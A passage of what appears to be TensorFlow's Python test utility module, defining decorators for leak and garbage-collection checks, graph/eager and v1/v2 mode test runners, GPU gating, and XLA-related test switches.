("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = _get_object_count_by_type() - obj_count_by_type
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except (ReferenceError, AttributeError):
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, denylist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(denylist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in denylist:
if b is obj:
return "<test code>"
if obj is denylist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, denylist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
denylist: same as denylist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, denylist):
return "{}{}".format(get_ignore_reason(obj, denylist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, denylist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
denylist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
denylist = denylist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, denylist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, denylist)
reprs[r_id] = describe(r, denylist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
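# Illustrative sketch (editor addition): what _combine_named_parameters produces for a
# small input. Scalars are treated as single-element lists, and keys are sorted.
def _example_combine_named_parameters():
  combos = _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
  # -> [OrderedDict([('mode', 'graph'), ('use_gpu', True)]),
  #     OrderedDict([('mode', 'eager'), ('use_gpu', True)])]
  return combos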
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
  dictionaries returned. The 'testcase_name' key is required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
  WARNING: This decorator can only be used in test cases that statically check
  the generated graph. Attempting to evaluate graph or function results via
  session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
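  Example (illustrative sketch; the test class and the op used are
  hypothetical, not part of this module):
  ```python
  class MyGraphStructureTest(test_util.TensorFlowTestCase,
                             parameterized.TestCase):
    @build_as_function_and_v1_graph
    def test_op_is_in_graph(self):
      math_ops.add(1, 2, name="my_add")
      op_names = [op.name for op in ops.get_default_graph().get_operations()]
      self.assertIn("my_add", op_names)
  ```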
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
        raise ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def eager_lazy_remote_copy_on_and_off(f):
"""Execute the test method w/o lazy tensor copy for function remote inputs."""
@parameterized.named_parameters([("WithLazyRemoteCopy", True), ("", False)])
@functools.wraps(f)
def decorator(self, lazily_remote_copy, *args, **kwargs):
if lazily_remote_copy:
context.context().lazy_remote_inputs_copy = True
else:
context.context().lazy_remote_inputs_copy = False
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
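  Example (illustrative sketch; the test class is hypothetical):
  ```python
  class MyAdditionTest(test_util.TensorFlowTestCase):
    @also_run_as_tf_function
    def test_add(self):
      # Runs eagerly once and once while tracing a tf.function; the assertion
      # is dispatched through tf.py_func in the latter case.
      self.assertAllEqual(math_ops.add(1, 2), 3)
  ```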
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
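  Example (illustrative sketch; the placeholder-based test below is
  hypothetical):
  ```python
  class MyFeedDictTest(test_util.TensorFlowTestCase):
    @deprecated_graph_mode_only
    def test_feed(self):
      x = array_ops.placeholder(dtypes.float32, shape=[2])
      with self.cached_session() as sess:
        self.assertAllEqual(sess.run(x, feed_dict={x: [1.0, 2.0]}),
                            [1.0, 2.0])
  ```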
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
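  Example (illustrative sketch):
  ```python
  class MyLegacyBehaviorTest(test_util.TensorFlowTestCase):
    @run_v1_only("Exercises behavior that only exists under TF1 semantics.")
    def test_v1_behavior(self):
      self.assertFalse(tf2.enabled())
  ```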
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
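  Example (illustrative sketch; the op used below is arbitrary):
  ```python
  class MyGpuTest(test_util.TensorFlowTestCase):
    @run_gpu_only
    def test_add_on_gpu(self):
      with ops.device("/device:GPU:0"):
        self.assertAllEqual(math_ops.add(1.0, 2.0), 3.0)
  ```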
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
  """Execute the decorated test only if a CUDA GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
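  Example (illustrative sketch; the dates below are arbitrary):
  ```python
  class MyCompatTest(test_util.TensorFlowTestCase):
    @with_forward_compatibility_horizons(None, (2099, 1, 1))
    def test_new_op_attr(self):
      # Runs once with the default horizon and once as if the horizon were
      # 2099-01-01, so both the old and the new code paths are exercised.
      ...
  ```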
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
  Warning: if a non-GPU version of the package is installed, the function will
  also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
  was built with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
  Note that the keyword arg name "cuda_only" is misleading (since the routine
  will return True when a GPU device is available irrespective of whether TF
  was built with CUDA support or ROCm support). However, no changes are made
  here because:
  ++ Changing the name "cuda_only" to something more generic would break
  backward compatibility.
  ++ Adding an equivalent "rocm_only" would require the implementation to check
  the build type. This in turn would require doing the same for CUDA and thus
  potentially break backward compatibility.
  ++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
  but would require most (if not all) callers to update the call to use
  "cuda_or_rocm_only" instead of "cuda_only".
Returns:
True if a GPU device of the requested kind is available.
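  Example (illustrative sketch; assumes the usual `tf.test` export of this
  function, and `run_gpu_specific_code` is a hypothetical helper):
  ```python
  if tf.test.is_gpu_available(cuda_only=True,
                              min_cuda_compute_capability=(7, 0)):
    run_gpu_specific_code()
  else:
    print("No CUDA GPU with compute capability >= 7.0; using the CPU path.")
  ```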
"""
# This was needed earlier when we had support for SYCL in TensorFlow.
del cuda_only
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
  Since the feed_dict is empty when not using placeholders, we should be able
  to call self.evaluate(); however, this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
      raise RuntimeError(
          "feed_dict is not supported when eager execution is enabled "
          "(in this case, sess.run(t) is shorthand for t.numpy())")
if args or kwargs:
      raise RuntimeError(
          "Optional args are not supported when eager execution is enabled "
          "(in this case, sess.run(t) is shorthand for t.numpy())")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
      # signal of completion.
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if is_tfrt_enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if is_tfrt_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
  Returns: Function that will decorate a given class's test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
